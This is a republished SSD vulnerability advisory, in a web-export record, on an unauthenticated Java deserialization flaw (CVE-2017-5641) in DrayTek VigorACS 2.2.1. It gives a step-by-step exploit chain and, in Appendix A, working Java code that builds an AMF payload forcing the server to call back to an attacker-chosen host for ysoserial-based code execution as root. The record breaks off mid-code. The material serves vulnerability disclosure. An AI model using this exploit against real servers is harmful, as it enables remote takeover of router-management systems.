{"id":12066,"date":"2018-04-18T14:19:04","date_gmt":"2018-04-18T22:19:04","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/04\/18\/news-5835\/"},"modified":"2018-04-18T14:19:04","modified_gmt":"2018-04-18T22:19:04","slug":"news-5835","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/04\/18\/news-5835\/","title":{"rendered":"SSD Advisory &#8211; Vigor ACS Unsafe Flex AMF Java Object Deserialization"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 18 Apr 2018 05:24:56 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3681\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3681');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> A vulnerability in Vigor ACS allows unauthenticated users to cause the product to execute arbitrary code.<\/p>\n<p>VigorACS 2 &#8220;is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 standard, which is an application layer protocol that provides the secure communication between the server and CPEs, and allows Network Administrator to manage all the Vigor devices (CPEs) from anywhere on the Internet. VigorACS 2 Central Management is suitable for the enterprise customers with a large scale of DrayTek routers and APs, or the System Integrator who need to provide a real-time service for their customer&#8217;s DrayTek devices.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Pedro Ribeiro, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> &#8220;We&#8217;ll release the new version 2.2.2 to resolve this problem and inform the user about the CVE ID and reporter.<br \/> The release note will be updated on Wednesday (Apr 4, 2018).<br \/> Kindly let me know if you have further question, thank you!&#8221;<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> VigorACS is a Java application that runs on both Windows and Linux. It exposes a number of servlets \/ endpoints under \/ACSServer, which are used for various functions of VigorACS, such as the management of routers and firewalls using the TR-069 protocol [2].<\/p>\n<p>One of the endpoints exposed by VigorACS, at \/ACSServer\/messabroker\/amf, is an Adobe\/Apache Flex service that is reachable by the managed routers and firewalls. This advisory shows that VigorACS uses a Flex version is vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java deserialization for Flex AMF<\/p>\n<p><strong>Technical Details<\/strong><br \/> By sending an HTTP POST request with random data to \/ACSServer\/messagebroker\/amf, the server will respond with a 200 OK and binary data that includes:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ad7c457c2e86195376012\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  &#8230;Unsupported AMF version XXXXX&#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>While in the server logs, a stack trace will be produced that includes the following:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ad7c457c2e8d270996623\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> flex.messaging.io.amf.AmfMessageDeserializer.readMessage &#8230;  flex.messaging.endpoints.amf.SerializationFilter.invoke &#8230;  &#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e8d270996623-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e8d270996623-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e8d270996623-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e8d270996623-1\"><span class=\"crayon-v\">flex<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">messaging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">amf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">AmfMessageDeserializer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">readMessage<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e8d270996623-2\"><span class=\"crayon-v\">flex<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">messaging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">endpoints<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">amf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SerializationFilter<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">invoke<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e8d270996623-3\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>A quick Internet search revealed CVE-2017-5641 [3], which clearly states in its description:<br \/> &#8220;Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.&#8221;<\/p>\n<p>Further reading in [4], [5] and [6] led to a proof of concept (Appendix A) that showed both on the server logs and in the HTTP responses that the deserialization could be exploited to achieve code execution.<br \/> A fully working exploit has been released with this advisory that works in the following way:<br \/> a) sends an AMF binary payload to \/ACSServer\/messagebroker\/amf as described in [5] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker<br \/> b) receives the JRMP connection with ysoserial&#8217;s JRMP listener [7]<br \/> c) configures ysoserial to respond with a CommonsCollections5 or CommonsCollections6 payload, as a vulnerable version of Apache Commons 3.1 is in the Java classpath of the server<br \/> d) executes code as root \/ SYSTEM<\/p>\n<p>The exploit has been tested against the Linux and Windows Vigor ACS 2.2.1, although it requires a ysoserial jar patched for multi argument handling (a separate branch in [7], or alternative a ysoserial patched with CommonsCollections5Chained or CommonsCollections6Chained &#8211; see [8]). <\/p>\n<p>Appendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [5], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability.<\/p>\n<p><strong>Appendix A<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ad7c457c2e92123676472\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import flex.messaging.io.amf.MessageBody;  import flex.messaging.io.amf.ActionMessage;  import flex.messaging.io.SerializationContext;  import flex.messaging.io.amf.AmfMessageSerializer;  import java.io.*;    public class ACSFlex {      public static void main(String[] args) {          Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));          \/\/ serialize object to AMF message          try {              byte[] amf = new byte[0];              amf = serialize((unicastRef));              DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));              os.write(amf);              System.out.println(&#8220;Done, payload written to &#8221; + args[2]);          } catch (IOException e) {              e.printStackTrace();          }      }        public static Object generateUnicastRef(String host, int port) {          java.rmi.server.ObjID objId = new java.rmi.server.ObjID();          sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);          sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);          return new sun.rmi.server.UnicastRef(liveRef);      }        public static byte[] serialize(Object data) throws IOException {          MessageBody body = new MessageBody();          body.setData(data);            ActionMessage message = new ActionMessage();          message.addBody(body);            ByteArrayOutputStream out = new ByteArrayOutputStream();            AmfMessageSerializer serializer = new AmfMessageSerializer();          serializer.initialize(SerializationContext.getSerializationContext(), out, null);          serializer.writeMessage(message);            return out.toByteArray();      }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e92123676472-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e92123676472-44\">44<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">flex<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">messaging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">amf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MessageBody<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">flex<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">messaging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">amf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ActionMessage<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">flex<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">messaging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SerializationContext<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">flex<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">messaging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">amf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">AmfMessageSerializer<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-7\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ACSFlex<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unicastRef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">generateUnicastRef<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Integer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parseInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ serialize object to AMF message<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">byte<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">amf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">byte<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">amf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">serialize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">unicastRef<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">DataOutputStream <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">DataOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FileOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">amf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">System<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">println<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Done, payload written to &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">IOException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span 